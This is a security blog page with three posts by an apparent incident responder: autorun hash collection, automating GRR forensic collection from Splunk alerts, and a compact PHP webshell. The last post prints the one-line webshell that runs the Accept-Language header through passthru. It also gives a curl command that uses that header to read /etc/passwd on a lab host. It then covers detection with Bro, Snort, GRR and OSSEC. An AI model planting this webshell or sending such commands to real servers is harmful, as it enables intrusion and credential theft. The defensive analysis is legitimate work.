Showing posts with label GRR. Show all posts
Showing posts with label GRR. Show all posts

Wednesday, October 9, 2019

Enterprise Autorun Collections with autorunsc.exe


Anyone know of a tool that can collect the hash of autorun locations as thorough as Mark Russinovich's autoruns tool? I thought it would be nice to have that level of detail reported to Splunk on all systems to check for badness in Virustotal, find the low hanging malware fruit.

Since I enjoy learning python and powershell, I put together a GRR python_hack which launches autorunsc.exe and sends the output to Splunk. With GRR Rapid Response you can launch this as a hunt on all hosts.

Full script is on github, here's a breakdown of what I (and thanks to the folks at stackoverflow.com) put together.

Process flow:
  • GRR python hack decodes, unzip then writes autorunsc.exe to target host
  • Python hack then executes powershell encoded command
  • Powershell command runs autorunsc.exe and reports specified details to event log via Write-EventLog where your log collector will pickup and forward on to your SIEM
GRR has some weirdness with very long lines, so had to break up the binary in two parts. autorunsc.exe binary is base64 encoded and assigned as autorunscBinary00 and autorunscBinary01. Since the binary is over 2000 lines, they are collapsed in the picture below for easier reading.

I encoded autorunsc.exe and the powershell script (b64Powershell variable) using this:
$data = { powershell script here } 
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($data)
$EncodedData =[Convert]::ToBase64String($Bytes)$EncodedData
For the binary file I used powershell get-content and assigned that output to $data

Here is the decoded powershell command in b64Powershell variable:


There are more fields available from autorunsc.exe, but for the purpose of checking hashes in Virustotal, i'm interested in SHA256, location, path and signer. Each of those values returned by autorunsc will be appended with "Field=" so its easier to work with in Splunk. Example query to view results:
index=windows GRR EventID=187 | table Workstation hash Location Path Signer

Now that you have all the hashes of autorun's in your SIEM, you can pipe those hashes to a Virustotal Splunk app and find some low hanging malware fruit!




Wednesday, October 21, 2015

Automating Forensic Artifact Collection with Splunk and GRR


Recently I had the need for GRR to collect forensic artifacts when a Splunk alert was triggered. The point of this is to collect the forensics data when a incident ticket is generated to save IR staff time and eliminate redundant redundant tasks.

Example Scenario
When a pre-defined malicious event is seen, Splunk will send an email with event details to the ticketing system and IR folks will investigate. One of the first step in the example below is to acquire the files in question with GRR. To save time we will want to automate the collection of evidence.

AV does a horrible job of detecting malicious scripts like JS.Proslikefan.B (and anything malicious in general). However, with the help of WLS this is simple to detect and alert on. Splunk search:
`wlslogs` (EventID=4688 OR EventID=592) InternalName=wscript.exe BaseFileName!=wscript.exe
To briefly explain this alert, JS.Proslikefan maintains persistent by executing a 'random filename.lnk' file in the startup folder. The LNK file executes a randomly named copy of 'wscript.exe' in the appdata folder along with the malicious script. When a person logs on to an infected machine it would generate a WLS event like this (snippet):

BaseFileName="udpbat.exe" InternalName="wscript.exe" CommandLine="C:\Users\tupac\AppData\Roaming\avseda\udpbat.exe  C:\Users\tupac\AppData\Roaming\avseda\vnyqxluw.js"

Process Overview 
1. Splunk alert finds execution of 'wscript.exe' when BaseFileName is not 'wscript.exe'.
2. Splunk alert launches 'wrapper.py' which then launches 'grrRemoteGetFile.py'. 
3. 'grrRemoteGetFile.py' sends GRR an API request to acquire files in question.
4. Profit.


Splunk uses its own python version which doesn't have modules like 'requests'. Rather than installing modules into Splunk's python, we can just use a wrapper which will use the system default version of python. 

Creating the Splunk Alert
Run the search and when you're satisfied your search has minimal false positives, save it as an Alert.
When going through the alert wizard check the 'enable' box under Run a script and enter wrapper.py


wrapper.py (Mashed together from a few examples on the Splunk forums):
 #!/usr/bin/python   
 import gzip, os, sys, csv   
 from subprocess import call   
   
 python_executable = "/usr/bin/python"   
 real_script = "/opt/splunk/bin/scripts/grrRemoteGetFile.py"   
   
 for envvar in ("PYTHONPATH", "LD_LIBRARY_PATH"):   
  if envvar in os.environ:   
   del os.environ[envvar]   
   
 def openany(p):   
  if p.endswith(".gz"):   
   return gzip.open(p)   
  else:   
   return open(p)   
   
 results_file = sys.argv[8]  
   
 for row in csv.DictReader(openany(results_file)):   
  my_command = [ python_executable, real_script, row["host"], ]   
  call(my_command)   

The wrapper script does the following: 
  • Remove environment path and LD_LIBRARY_PATH
  • Opens the splunk search results (unzip's and reads csv for host value) .
  • Execute 'grrRemoteGetFile.py' with the systems default python along with the hostname that triggered the alert.

Splunk will pass 9 variables to the script when it executes. Variable 8 contains the path to the gzip'd search results in csv format. The other variables are documented here.


grrRemoteGetFile.py 
 #!/usr/bin/python    
 import sys, json, urllib2, base64, requests   
 from requests.auth import HTTPBasicAuth   
   
 hostname = sys.argv[2]  
   
 grrserver = 'https://grrserver:8000'   
 username = 'Tupac'   
 password = 'isAlive'   
   
 base64string = base64.encodestring('%s:%s' % (username, password)).replace('\n', '')   
 authheader = "Basic %s" % base64string   
   
 index_response = requests.get(grrserver, auth=HTTPBasicAuth(username, password))   
 csrf_token = index_response.cookies.get("csrftoken")   
   
 headers = {   
  "Authorization": authheader,   
  "x-csrftoken": csrf_token,   
  "x-requested-with": "XMLHttpRequest"   
  }   
   
 data = {   
  "hostname": hostname,   
  "paths": ["%%users.appdata%%\Roaming\*\*.{js,exe}",   
            "%%users.appdata%%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk"],    
  "pathtype": "OS"    
  }   
   
 response = requests.post(grrserver + "/api/clients/" + hostname + "/flows/remotegetfile",   
        headers=headers, data=json.dumps(data),   
        cookies=cookies, auth=HTTPBasicAuth(username, password))   


'grrRemoteGetFile.py' will start a FileFinder flow on the 'hostname' variable passed to it by the 'wrapper.py' script. When IR staff is able to review the ticket, the files will be available in GRR to download and review.

In Summary...
This is just a basic example to demonstrate how all the pieces fit together. There are some really cool things you can do with these tools to automate stuff. Some things I've been playing with:

Automatically launch Incident Response Collector ($MFT, Registry, Browser History, etc.) and full memory image when a known bad MD5 or static indicator is seen in Splunk.

Utilize WLS's hash tracking to automatically submit new binaries to internal malware analysis tools. Splunk alert would be:
`wlslogs` (EventID=4688 OR EventID=592) NewHash=True
In the wrapper.py, you would add row["NewProcessName"] and pass it to grrRemoteGetFile.py to download (instead of the static path in the example above).

Get any executable downloaded from the internet and send it to internal malware analysis tools.
`wlslogs` (EventID=4688 OR EventID=592) Zone=3
Get any compressed file attachment opened from Outlook email and send to internal malware analysis tools.
`wlslogs` (EventID=4688 OR EventID=592) CreatorProcessName=OUTLOOK BaseFileName=winzip*

If you have any examples/suggestions on automation with GRR and WLS/Splunk, share them on the GRR user group, I'm really interested to hear what other folks have done.

Monday, September 2, 2013

GET your Webshell While Evading Detection

Recently I came across a webshell that was a bit different from the others. Besides being only 48 bytes it uses the 'Accept-Language' http header field for accepting remote commands. The webshell on the server would only need to contain: <?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"))?>


There are a few benefits to this from the attackers perspective. The main benefit is that utilizes HTTP GET which is quite difficult to find anomalies from the http logs, even with Splunk (unless the attacker calls the file webshell.php). I would bet most people would be on the lookout for http posts to a new file versus http get. With Splunk you can monitor and alert on http POST deviations, but with GET it seem that strategy won't cut it. 

Using curl we GET the request 48bytes.php and add in the Accept-Language header followed by the shell command of 'cat /etc/passwd'.  Additionaly I added in the -A to use a less conspicuous user agent.
curl -H "Accept-Language: cat /etc/passwd" -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:72.0) Gecko/20132121 Firefox/19.0" http://192.168.110.114/webshells/48bytes.php

When requesting the webshell, the Apache logs will show (standard CentOS 6 install):
 [01/Sep/2013:13:02:37 -0700] "GET /webshells/48bytes.php HTTP/1.1" 200 1973 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0"

The response from the web server, as you would expect looks like this:


 Running tcpdump we can see the following traffic flow:

Following the tcp stream in wireshark gives us this view: (notice the Accept-Language: cat /etc/passwd)

So how do the good guys detect this?

I was hoping that Bro Network Security Monitor would help, however by default it doesn't log the Accept-Language string (It logs which headers are used).  Even if the majority of sites in your enterprise use TLS it's probably not a bad idea to enable the collection of header data to your web servers.  If you're sending the Bro logs to Splunk (with header data) you can create an alert to fire on key words, length etc.

Bro_http log of 'cat /etc/passwd' via webshell:
1378069940.789597 SvWL0TLDOB3 192.168.110.129 58148 192.168.110.114 80 0 - - - - - 0 1973 200 OK - - - (empty) - HOST,USER-AGENT,ACCEPT,ACCEPT-LANGUAGE,ACCEPT-ENCODING,REFERER,CONNECTION HOST,USER-AGENT,ACCEPT,ACCEPT-LANGUAGE,ACCEPT-ENCODING,REFERER,CONNECTION


Using Snort also has the same drawback of missing out on TLS connections. If you are using a Proxy and have a tap into the unencrypted traffic this would be an ideal solution (along with using Bro). 

Using Google Rapid Response (GRR) you can launch a hunt on your web servers (or all servers for that matter) for files containing 'passthru' and '<?php'. Of course prevention is much easier to do then detecting it.

With OSSEC file integrity monitor you will have a file based method of detection depending on the site content and structure. Since most people exclude temp directories from file integrity monitor, its the best place to put a webshell ;)

Prevention

If you have a public facing server without grsecurity, yer gonna have a bad time. In my opinion grsec with a well defined policy is the first place to start.  Well maybe the first place start is having the admins disable exec(), passthru() and system()! Good luck with that :)